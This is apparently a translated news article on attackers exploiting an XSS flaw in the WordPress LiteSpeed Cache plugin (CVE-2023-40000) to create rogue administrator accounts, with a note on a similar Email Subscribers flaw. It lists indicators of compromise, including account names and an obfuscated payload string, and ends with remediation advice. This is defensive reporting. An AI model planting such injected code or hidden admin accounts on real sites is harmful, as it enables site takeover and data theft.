WordPress is once again the target of cyberhackers who exploit a critical flaw in the LiteSpeed Cache plugin allowing them to create site administrators over which they take control.
If WordPress is the most popular CMS, it is also the favorite hunting ground of hackers, who do not use its plugins in the same way as website creators.
Indeed, after a flaw discovered within LayerSlider in April, preceded by the vulnerability of LiteSpeed in March and the Bricks theme in February, the month of May 2024 promises to be, unfortunately, rich in flaws for WordPress, with the latest in date unearthed by researchers from the WPScan security team which weakens the LiteSpeed Cache plugin.
How hackers create administrators
“wpsupp-user” or “wp-configuser”
If you notice that a new admin of your WordPress website has appeared under the name of
“wpsupp-user” or “wp-configuser” is a bad sign. Because this is how hackers name the administrators they create by injecting corrupted JavaScript code either into files or into the site’s database. And if in addition, the option “litespeed.admin_display.messages” contains the string “eval(atob(Strings.fromCharCode”, then it’s a double whammy, your database is also affected.
At the origin of this contamination, the unauthenticated cross-site scripting flaw, CVE-2023-40000, which received a very high rating of 8.3 out of 10, classifying it directly as “very high”. It is therefore this flaw that hackers exploit to inject their code and create fake site admins.
And although this flaw is only exploitable on versions of the plugin prior to 5.7.0.1, WPScan indicates that another 1,835,000 sites still use it and are therefore potentially attacked.
The administrator account, the holy grail of WordPress site hackers
If cyberhackers are so keen to create administrator accounts, it’s not just for glory. Indeed, all admitted websites, whatever their CMS or host, are the masters of the keys. An administrator account allows its owner to have control over all of the site’s data, from the CMS to content management and plugins, including more sensitive data, such as email addresses or identifiers. . So many permissions that hackers will use in their own way. They will be able to distribute malware at will, redirect to fraudulent sites, hide malware in databases or via code, steal sensitive data and of course, launch phishing campaigns.
It is therefore quite natural that the Wallarm team recently discovered that another critical flaw, CVE-2024-2876 with a rating of 9.8 out of 10, within another WordPress plugin, “ Email Subscribers” for versions prior to 5.7.14. Again, the goal was to create administrator accounts.
The two companies recommend a major spring cleaning of the affected sites, namely the total restoration of the database and files to make a backup free of all traces of the attacks, the deletion of compromised admin accounts, the reset of all identifiers accounts, and of course, increased monitoring of any new suspicious administrator accounts. A huge task entrusted to… an administrator.
Source : Bleeping Computer, WPScan, Wallarm
0